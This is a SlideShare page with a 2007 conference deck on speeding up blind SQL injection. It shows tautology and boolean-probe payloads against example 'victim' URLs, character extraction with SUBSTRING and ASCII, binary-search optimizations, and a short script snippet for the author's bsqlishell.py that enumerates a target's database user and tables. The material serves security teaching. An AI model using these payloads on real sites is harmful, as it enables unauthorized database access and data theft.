SlideShare a Scribd company logo

Blind SQL Injection - Optimization Techniques

Download as PPT, PDF
A
amiable_indian

This document discusses blind SQL injection techniques and optimizations. It begins with an overview of SQL injection and blind SQL injection. It then discusses available tools for exploiting blind SQL injection and various techniques for optimizing the process, such as narrowing the character set, using binary search to find characters more quickly, and treating numeric fields as strings. The document concludes by demonstrating a Python tool called bsqlishell.py that implements these optimized techniques in an interactive shell for exploiting blind SQL injection.

Technology
1 of 17
Downloaded 125 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Blind SQL injection Optimization techniques Rodrigo Marcos December 2007
Agenda What is (blind) SQL injection Available Open Source tools Blind SQL injection optimizations Demo Conclusions Questions
What is SQL injection? Well known and exploited technique Mainly exploited in web environments It abuses improper user input validation Allows an attacker to reach the database
SQL injection example http://victim/listproducts.asp?cat= books SELECT * from PRODUCTS WHERE category=‘ books ’ http://victim/listproducts.asp?cat= books’ or ‘1’=‘1 SELECT * from PRODUCTS WHERE category=‘ books’ or ‘1’=‘1 ’ Basically, on SQL injection the attacker gets results.
What is blind SQL injection? Same vulnerability as SQL injection *Very* common vulnerability Sometimes (wrongly) ignored during tests as unexploitable or not detected The attacker can not retrieve results The attacker can only retrieve a True/False condition
Blind SQL injection example http://victim/showproduct.asp?id= 238 SELECT * from PRODUCTS WHERE id= 238 Sometimes, due to the code surronding the SQL query (grouped or sorted) the attacker can’t UNION and no ‘good’ ways of exploitation are found http://victim/showproduct.asp?id= 238 and 1=1 http://victim/showproduct.asp?id= 238 and 1=2 SELECT * from PRODUCTS WHERE id= 238 and 1=1 SELECT * from PRODUCTS WHERE id= 238 and 1=2 Blind SQL happens if the requests above return different results
Exploiting True/False conditions Select user returns ‘dbo’ SUBSTRING(‘Select user’, 1, 1) = ‘d’ SUBSTRING(‘Select user’, 2, 1) = ‘b’ SUBSTRING(‘Select user’, 3, 1) = ‘o’ http://victim/showproduct.asp?id= 238 and SUBSTRING(‘Select user’, 1, 1) = ‘d’  TRUE http://victim/showproduct.asp?id= 238 and SUBSTRING(‘Select user’, 1, 1) = ‘X’  FALSE
Available solutions Custom Script: We can script it and discover each letter Set a space: [a-z] + [A-Z] + [0-9] + [symbols] Loop for every character Absinthe http://www.0x90.org/releases/absinthe/ BSQLBF http://www.unsec.net/download/bsqlbf.pl http://www.unsec.net/download/bsqlbf.avi SQLMap, SQLBrute.py
Available solutions Custom scripts: Not reusable. I got sick of writing dirty BSQL injection scripts… Available open source tools: Some of them are too dumb trying to be smart (and don’t work in special situations) Most are not interactive None are optimized for speed
Blind SQL injections optimizations Narrow down the charset: ASCII( UPPER (SUBSTRING((SQL Query), Position, 1)))= ASCII(SUBSTRING((SQL Query), Position, 1)) ASCII( LOWER (SUBSTRING((SQL Query), Position, 1)))= ASCII(SUBSTRING((SQL Query), Position, 1)) If first one true, character is uppercase If second one true, character is uppercase If both are true, it is a number or symbol
Blind SQL injections optimizations Searching character space: [a,b,c,d,e,f,g,h,I,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z] Sequential search: Not optimum Divide and conquer! Character => ‘m’ [m,n,o,p,q,r,s,t,u,v,w,x,y,z] else [a,b,c,d,e,f,g,h,I,j,k,l]
Blind SQL injections optimizations Big numbers for table enumeration Typical MSSQL table id: 2089058478 Absinthe: Increase exponentially from 0 by factor of two Narrow down when upper limit is discovered Optimization: CAST(Number as varchar) and treat is as a string with numbers
bsqlishell.py I wanted to code something generic to forget about custom scripts I wanted to write optimum techniques as BSQL injection is *REALLY* slow Interactive shell + scriptable (Scapy like) bsqlishell.py is fast(er)!! Portable (python rocks!)
Demo
and more… Interaction sucks! I want something scriptable! from bsishell import * pre = “http://www.vulnerable.com?id=1’ and “ post = “ or ‘1’=‘2” user() table_enumeration()
Conclusions Blind SQL injection can be exploited and it really makes a difference The attack can be optimized for fewer requests to the database bsqlishell.py is quite cool (shameless propaganda)
Thanks Questions?

More Related Content

Similar to Blind SQL Injection - Optimization Techniques (20)

PDF
Static types on javascript?! Type checking approaches to ensure healthy appli...
Arthur Puthin
 
PPTX
Web Security - Hands-on
Andrea Valenza
 
PDF
Defcon 17-joseph mccray-adv-sql_injection
Ahmed AbdelSatar
 
PPTX
Do I need tests when I have the compiler - Andrzej Jóźwiak - TomTom Dev Day 2020
Andrzej Jóźwiak
 
PDF
Php Security - OWASP
Mizno Kruge
 
PPT
12-security.ppt - PHP and Arabic Language - Index
webhostingguy
 
PPT
Security.ppt
webhostingguy
 
PPTX
Ppt on sql injection
ashish20012
 
PPTX
Applying Compiler Techniques to Iterate At Blazing Speed
Pascal-Louis Perez
 
PDF
Asp
Adil Jafri
 
PDF
2013 - Andrei Zmievski: Machine learning para datos
PHP Conference Argentina
 
PPT
Advanced Topics On Sql Injection Protection
amiable_indian
 
PDF
SQL Injection
Magno Logan
 
PPT
ShmooCon 2009 - (Re)Playing(Blind)Sql
Chema Alonso
 
PPT
Sql Injection Attacks Siddhesh
Siddhesh Bhobe
 
PDF
Neutralizing SQL Injection in PostgreSQL
Juliano Atanazio
 
PDF
PHP Secure Programming
Balavignesh Kasinathan
 
PDF
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
Felipe Prado
 
PDF
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
PDF
C++ questions And Answer
lavparmar007
 
Static types on javascript?! Type checking approaches to ensure healthy appli...
Arthur Puthin
 
Web Security - Hands-on
Andrea Valenza
 
Defcon 17-joseph mccray-adv-sql_injection
Ahmed AbdelSatar
 
Do I need tests when I have the compiler - Andrzej Jóźwiak - TomTom Dev Day 2020
Andrzej Jóźwiak
 
Php Security - OWASP
Mizno Kruge
 
12-security.ppt - PHP and Arabic Language - Index
webhostingguy
 
Security.ppt
webhostingguy
 
Ppt on sql injection
ashish20012
 
Applying Compiler Techniques to Iterate At Blazing Speed
Pascal-Louis Perez
 
Asp
Adil Jafri
 
2013 - Andrei Zmievski: Machine learning para datos
PHP Conference Argentina
 
Advanced Topics On Sql Injection Protection
amiable_indian
 
SQL Injection
Magno Logan
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
Chema Alonso
 
Sql Injection Attacks Siddhesh
Siddhesh Bhobe
 
Neutralizing SQL Injection in PostgreSQL
Juliano Atanazio
 
PHP Secure Programming
Balavignesh Kasinathan
 
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
Felipe Prado
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
C++ questions And Answer
lavparmar007
 

More from amiable_indian (20)

PDF
Phishing As Tragedy of the Commons
amiable_indian
 
PDF
Cisco IOS Attack & Defense - The State of the Art
amiable_indian
 
PDF
Secrets of Top Pentesters
amiable_indian
 
PPS
Workshop on Wireless Security
amiable_indian
 
PDF
Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...
amiable_indian
 
PPS
Workshop on BackTrack live CD
amiable_indian
 
PPS
Reverse Engineering for exploit writers
amiable_indian
 
PPS
State of Cyber Law in India
amiable_indian
 
PPS
AntiSpam - Understanding the good, the bad and the ugly
amiable_indian
 
PPS
Reverse Engineering v/s Secure Coding
amiable_indian
 
PPS
Network Vulnerability Assessments: Lessons Learned
amiable_indian
 
PPS
Economic offenses through Credit Card Frauds Dissected
amiable_indian
 
PPS
Immune IT: Moving from Security to Immunity
amiable_indian
 
PPS
Reverse Engineering for exploit writers
amiable_indian
 
PPS
Hacking Client Side Insecurities
amiable_indian
 
PDF
Web Exploit Finder Presentation
amiable_indian
 
PPT
Network Security Data Visualization
amiable_indian
 
PPT
Enhancing Computer Security via End-to-End Communication Visualization
amiable_indian
 
PDF
Top Network Vulnerabilities Over Time
amiable_indian
 
PDF
What are the Business Security Metrics?
amiable_indian
 
Phishing As Tragedy of the Commons
amiable_indian
 
Cisco IOS Attack & Defense - The State of the Art
amiable_indian
 
Secrets of Top Pentesters
amiable_indian
 
Workshop on Wireless Security
amiable_indian
 
Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...
amiable_indian
 
Workshop on BackTrack live CD
amiable_indian
 
Reverse Engineering for exploit writers
amiable_indian
 
State of Cyber Law in India
amiable_indian
 
AntiSpam - Understanding the good, the bad and the ugly
amiable_indian
 
Reverse Engineering v/s Secure Coding
amiable_indian
 
Network Vulnerability Assessments: Lessons Learned
amiable_indian
 
Economic offenses through Credit Card Frauds Dissected
amiable_indian
 
Immune IT: Moving from Security to Immunity
amiable_indian
 
Reverse Engineering for exploit writers
amiable_indian
 
Hacking Client Side Insecurities
amiable_indian
 
Web Exploit Finder Presentation
amiable_indian
 
Network Security Data Visualization
amiable_indian
 
Enhancing Computer Security via End-to-End Communication Visualization
amiable_indian
 
Top Network Vulnerabilities Over Time
amiable_indian
 
What are the Business Security Metrics?
amiable_indian
 
Ad

Recently uploaded (20)

PPTX
Designing Production-Ready AI Agents
Kunal Rai
 
PDF
CIFDAQ Market Wrap for the week of 4th July 2025
CIFDAQ
 
PDF
Bitcoin for Millennials podcast with Bram, Power Laws of Bitcoin
Stephen Perrenod
 
PDF
"AI Transformation: Directions and Challenges", Pavlo Shaternik
Fwdays
 
PDF
What Makes Contify’s News API Stand Out: Key Features at a Glance
Contify
 
PDF
IoT-Powered Industrial Transformation – Smart Manufacturing to Connected Heal...
Rejig Digital
 
PDF
Go Concurrency Real-World Patterns, Pitfalls, and Playground Battles.pdf
Emily Achieng
 
PDF
Newgen Beyond Frankenstein_Build vs Buy_Digital_version.pdf
darshakparmar
 
PDF
July Patch Tuesday
Ivanti
 
PDF
Agentic AI lifecycle for Enterprise Hyper-Automation
Debmalya Biswas
 
PDF
CIFDAQ Token Spotlight for 9th July 2025
CIFDAQ
 
PDF
Using FME to Develop Self-Service CAD Applications for a Major UK Police Force
Safe Software
 
PDF
POV_ Why Enterprises Need to Find Value in ZERO.pdf
darshakparmar
 
PDF
Reverse Engineering of Security Products: Developing an Advanced Microsoft De...
nwbxhhcyjv
 
PDF
Transcript: New from BookNet Canada for 2025: BNC BiblioShare - Tech Forum 2025
BookNet Canada
 
PDF
Smart Trailers 2025 Update with History and Overview
Paul Menig
 
PPTX
"Autonomy of LLM Agents: Current State and Future Prospects", Oles` Petriv
Fwdays
 
PDF
Newgen 2022-Forrester Newgen TEI_13 05 2022-The-Total-Economic-Impact-Newgen-...
darshakparmar
 
PPTX
Building Search Using OpenSearch: Limitations and Workarounds
Sease
 
PPTX
Webinar: Introduction to LF Energy EVerest
DanBrown980551
 
Designing Production-Ready AI Agents
Kunal Rai
 
CIFDAQ Market Wrap for the week of 4th July 2025
CIFDAQ
 
Bitcoin for Millennials podcast with Bram, Power Laws of Bitcoin
Stephen Perrenod
 
"AI Transformation: Directions and Challenges", Pavlo Shaternik
Fwdays
 
What Makes Contify’s News API Stand Out: Key Features at a Glance
Contify
 
IoT-Powered Industrial Transformation – Smart Manufacturing to Connected Heal...
Rejig Digital
 
Go Concurrency Real-World Patterns, Pitfalls, and Playground Battles.pdf
Emily Achieng
 
Newgen Beyond Frankenstein_Build vs Buy_Digital_version.pdf
darshakparmar
 
July Patch Tuesday
Ivanti
 
Agentic AI lifecycle for Enterprise Hyper-Automation
Debmalya Biswas
 
CIFDAQ Token Spotlight for 9th July 2025
CIFDAQ
 
Using FME to Develop Self-Service CAD Applications for a Major UK Police Force
Safe Software
 
POV_ Why Enterprises Need to Find Value in ZERO.pdf
darshakparmar
 
Reverse Engineering of Security Products: Developing an Advanced Microsoft De...
nwbxhhcyjv
 
Transcript: New from BookNet Canada for 2025: BNC BiblioShare - Tech Forum 2025
BookNet Canada
 
Smart Trailers 2025 Update with History and Overview
Paul Menig
 
"Autonomy of LLM Agents: Current State and Future Prospects", Oles` Petriv
Fwdays
 
Newgen 2022-Forrester Newgen TEI_13 05 2022-The-Total-Economic-Impact-Newgen-...
darshakparmar
 
Building Search Using OpenSearch: Limitations and Workarounds
Sease
 
Webinar: Introduction to LF Energy EVerest
DanBrown980551
 
Ad

Blind SQL Injection - Optimization Techniques

  • 1. Blind SQL injection Optimization techniques Rodrigo Marcos December 2007
  • 2. Agenda What is (blind) SQL injection Available Open Source tools Blind SQL injection optimizations Demo Conclusions Questions
  • 3. What is SQL injection? Well known and exploited technique Mainly exploited in web environments It abuses improper user input validation Allows an attacker to reach the database
  • 4. SQL injection example http://victim/listproducts.asp?cat= books SELECT * from PRODUCTS WHERE category=‘ books ’ http://victim/listproducts.asp?cat= books’ or ‘1’=‘1 SELECT * from PRODUCTS WHERE category=‘ books’ or ‘1’=‘1 ’ Basically, on SQL injection the attacker gets results.
  • 5. What is blind SQL injection? Same vulnerability as SQL injection *Very* common vulnerability Sometimes (wrongly) ignored during tests as unexploitable or not detected The attacker can not retrieve results The attacker can only retrieve a True/False condition
  • 6. Blind SQL injection example http://victim/showproduct.asp?id= 238 SELECT * from PRODUCTS WHERE id= 238 Sometimes, due to the code surronding the SQL query (grouped or sorted) the attacker can’t UNION and no ‘good’ ways of exploitation are found http://victim/showproduct.asp?id= 238 and 1=1 http://victim/showproduct.asp?id= 238 and 1=2 SELECT * from PRODUCTS WHERE id= 238 and 1=1 SELECT * from PRODUCTS WHERE id= 238 and 1=2 Blind SQL happens if the requests above return different results
  • 7. Exploiting True/False conditions Select user returns ‘dbo’ SUBSTRING(‘Select user’, 1, 1) = ‘d’ SUBSTRING(‘Select user’, 2, 1) = ‘b’ SUBSTRING(‘Select user’, 3, 1) = ‘o’ http://victim/showproduct.asp?id= 238 and SUBSTRING(‘Select user’, 1, 1) = ‘d’  TRUE http://victim/showproduct.asp?id= 238 and SUBSTRING(‘Select user’, 1, 1) = ‘X’  FALSE
  • 8. Available solutions Custom Script: We can script it and discover each letter Set a space: [a-z] + [A-Z] + [0-9] + [symbols] Loop for every character Absinthe http://www.0x90.org/releases/absinthe/ BSQLBF http://www.unsec.net/download/bsqlbf.pl http://www.unsec.net/download/bsqlbf.avi SQLMap, SQLBrute.py
  • 9. Available solutions Custom scripts: Not reusable. I got sick of writing dirty BSQL injection scripts… Available open source tools: Some of them are too dumb trying to be smart (and don’t work in special situations) Most are not interactive None are optimized for speed
  • 10. Blind SQL injections optimizations Narrow down the charset: ASCII( UPPER (SUBSTRING((SQL Query), Position, 1)))= ASCII(SUBSTRING((SQL Query), Position, 1)) ASCII( LOWER (SUBSTRING((SQL Query), Position, 1)))= ASCII(SUBSTRING((SQL Query), Position, 1)) If first one true, character is uppercase If second one true, character is uppercase If both are true, it is a number or symbol
  • 11. Blind SQL injections optimizations Searching character space: [a,b,c,d,e,f,g,h,I,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z] Sequential search: Not optimum Divide and conquer! Character => ‘m’ [m,n,o,p,q,r,s,t,u,v,w,x,y,z] else [a,b,c,d,e,f,g,h,I,j,k,l]
  • 12. Blind SQL injections optimizations Big numbers for table enumeration Typical MSSQL table id: 2089058478 Absinthe: Increase exponentially from 0 by factor of two Narrow down when upper limit is discovered Optimization: CAST(Number as varchar) and treat is as a string with numbers
  • 13. bsqlishell.py I wanted to code something generic to forget about custom scripts I wanted to write optimum techniques as BSQL injection is *REALLY* slow Interactive shell + scriptable (Scapy like) bsqlishell.py is fast(er)!! Portable (python rocks!)
  • 14. Demo
  • 15. and more… Interaction sucks! I want something scriptable! from bsishell import * pre = “http://www.vulnerable.com?id=1’ and “ post = “ or ‘1’=‘2” user() table_enumeration()
  • 16. Conclusions Blind SQL injection can be exploited and it really makes a difference The attack can be optimized for fewer requests to the database bsqlishell.py is quite cool (shameless propaganda)